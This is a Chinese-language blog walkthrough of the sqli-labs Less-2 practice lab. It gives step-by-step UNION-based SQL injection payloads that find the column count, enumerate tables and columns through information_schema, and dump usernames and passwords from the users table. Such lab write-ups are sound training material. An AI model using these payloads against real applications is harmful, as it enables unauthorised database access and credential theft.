sqli-labs less-2

最新推荐文章于 2021-07-05 09:24:16 发布
最新推荐文章于 2021-07-05 09:24:16 发布
阅读量143 收藏
点赞数
分类专栏: sqli-labs 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52250313/article/details/115278314
版权

文章目录

sqli=labs less-2

*判断是否存在注入

输入?id=1 回显正常

在这里插入图片描述

输入?id=1' 回显错误

在这里插入图片描述

输入?id=1 and 1=1 回显正常

输入?id=1 and 1=2 回显错误

说明存在整数型注入点

页面未报错,查询结果为空,表明存在注入点,and查询被直接代入到了原查询语句中,可以直接在后面进行联合查询
(PS:因为本关是数字型注入,没有引号/括号的包裹,所以注入点更容易被发现)

* 判断列数

输入?id=1 order by 3 --+ 回显正常

输入?id=1 order by 4 --+ 回显错误

说明列数为3,有三个字段

* 报显示位

使用联合查询

输入?id=-1 and 1=2 union  select 1,2,3 --+

在这里插入图片描述

由图可知,显示位在2和3上

* 查询详细信息

接下来用database()和version()查询PHP版本和数据库名称

输入?id=-1 and 1=2 union select 1,database(),version() --+

在这里插入图片描述

由图可知,数据库名称为security,PHP版本为5.5.53

* 查询具体内容

* 查询security库下的表

输入?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 'security' --+

在这里插入图片描述

由图可知,security库下有4个表

* 查询表中的列

输入?id=-1 union select 1, group_concat(column_name),3 from information_schema.columns where table_name = 'users' --+

在这里插入图片描述

* 输出最终查询到的信息

输入?id=-1  union select 1,username,password from users where id = 1 --+

………………

?id=-1  union select 1,username,password from users where id = 12 --+

从1-12都有内容

在这里插入图片描述

即完成

阿刁〇하
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Sqli-labs之Less-2
→_→
03-12 1221
Less-2 翻译:获取-基于错误-基于整数 欢迎Dhakkan 请输...
sql注入系列之Sqli-labs(less-2)
BetsyMyGirl的博客
11-30 1425
判断注入点 http://192.168.81.210/sqli/Less-2/?id=1’输入单引号发现出现了sql语句报错,可以知道单引号已经进入到数据库里执行了,语句类似于 select * from users where id =1' limit 0,1 因为正常的情况下,用户只能将搜索的参数传入到数据库里面进行查询,是不可能去修改查询语句的,上方的报错就是由于用户修改了查询的语句而引起的,将以上语句代入到自己的数据库里执行也是会报错的,因为多了一个单引号。 判断注入类型 输入1 and 1=1
SQLi-LABS Less-2,联合注入+报错注入
热门推荐
wangyuxiang946的博客
06-19 1万+
SQLi第二关,sqli labs less2,sqlilabs less2
sqli-labs Less-2
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-31 199
sqli-labs Less-21.判断注入类型2.测试字段数3.使用联合查询查看页面的显示位4.爆出数据库版本和当前数据库名5.爆出所有数据库6.爆出当前数据库所有表7.查询当前数据库users表所有字段8.查询数据 1.判断注入类型 index.php?id=1*1 index.php?id=1*2 测试得知为整形注入 2.测试字段数 index.php?id=1 order by 4#...
sqlilabs(SQL注入)小白通基础通关笔记(专针对小白)(第二关Less-2)
u013630181的博客
07-05 253
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=ut
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
sqli-labs PoC 脚本.rar
08-09
sqli-labs 使用到的脚本 课程有:Less01,Less05的爆破数据库+表名+列名数据,Less08的爆破数据库+表名+列名数据,Less9同上,Less11同上,Less16同上。 具体涉及:报错型注入,报错型盲注,布尔型盲注,延时型盲注...
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
下载 sqli-labs 工程,文件名为 sqli_labs_sqli-for7.zip。将下载好的压缩包解压到 phpstudy 的网站根目录下,例如 D:/phpstudy_pro/WWW/。文件夹名字可以自定义,但是要跟 phpstudy 中指定的域名一致,这个就是后面...
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例.doc
07-09
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例 本文档主要讲解了如何结合手工注入编写一个SQL盲注脚本,以SQLi-Labs less16为例。整个过程可以分为两部分:分析测试注入点和获取数据库名编写脚本。 ...
sqli-labs lesson8 python 脚本源代码(修复小bug后的版本)
04-29
该源代码是sqli-labs/Less-8所使用到的脚本源代码,运行环境是python3.资源分最低只能选2,我也没办法,或者给我留言也行,本人也是菜鸟一个,无意通过这个收取资源分,哈哈
Sqli-Labs闯关—Less 2
weixin_39157582的博客
08-19 145
安装sqli-labs1、phpstudy安装1.1、Mysql中注释符有三种1.2、总结2、单引号1.1、1.2、新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 1、phpstudy安装 安装phpstudy2018 下
sqli-labs练习之 Less-2
博客地址 www.sec0nd.top
06-06 213
sql基础操作 查库:select schema_name from information_schema. schemata; 查表:select table_name from information_schema.tables where table_schema=‘security’; 查列:select column_name from information_schema.columns where table_name=‘users’ 查字段:select username,password
sqli-labs Less-2解题思路
qq_35266419的博客
05-09 826
首先声明一下,我自己也是一名小白,或者你可以叫我“脚本小子”。只是喜欢这个东西就去钻研,有一点心得就发布出来与大家探讨,有问题请多多指教。末尾更精彩! Less-2 GET-Error based-intiger based ①打开页面,如图所示: ②[如图所示:please input the ID as parameter … ]此处id 传递参数,先测试是否存在漏洞 ③根据返回错误页面...
sqli-labs-master【Less-2】解题过程
u010149713的博客
05-29 515
id=1 #1.正常显示 id=1' #2.错误回显 #You have an error in your SQL syntax; check the manual that corresponds to your MariaDB #server version for the right syntax to use near '' LIMIT 0,1' at line 1 #'' LIMIT...
在线sqli-labs 通关大全 Less-2
qq_44985415的博客
08-29 492
sqli-labs (2) 励志语录 青年是学习智慧的时期,中年是付诸实践的时期。——卢梭 1.知识点 sql注入常见参数 user():当前数据库用户 database():当前数据库名 concat():联合数据,用于联合两条数据结果。如 concat(username,0x3a,password) group_concat():和 concat() 类似,如 group_concat(DISTINCT+user,0x3a,password),用于把多条数据一次注入出来 concat_ws():用
Sqli-labs之Less1-10
Mi1k7ea
04-14 4508
为了更好地学习SQL注入,便从sqli-labs开始入手吧。很多东西都是不懂,所以也是从各位前辈、大牛的博客以及书籍中去学习,将自己学到的都记录一下,以便以后的查看。同时也希望各位能够多多给点指导,让本人能够更好地掌握各种方法技巧等等。 为了更方便地实现操作,直接用Firefox的HackBar插件来操作~ Less1--基于错误的单引号字符型注入 直接在url中输入?id=1可以看
Sqli-labs less 2
weixin_34175509的博客
08-11 113
Less-2 将'(单引号)添加到数字中。 我们又得到了一个Mysql返回的错误,提示我们语法错误。 YouhaveanerrorinyourSQLsyntax;checkthemanualthatcorrespondstoyourMySQLserverversionfortherightsyntaxtousenear''LIMIT...
Sqli-Labs之less-2
ISNS的博客
02-05 961
说在开头:文章是我通过查询资料后按照自己的理解总结出来的,所以如果有说法不对的地方,欢迎大佬指正~
sqli-labs-less
最新发布
07-25
- *1* *2* *3* [sqli-labs-less-1完整解析,小白干货](https://blog.csdn.net/qq_46432288/article/details/109226871)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

阿刁〇하

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值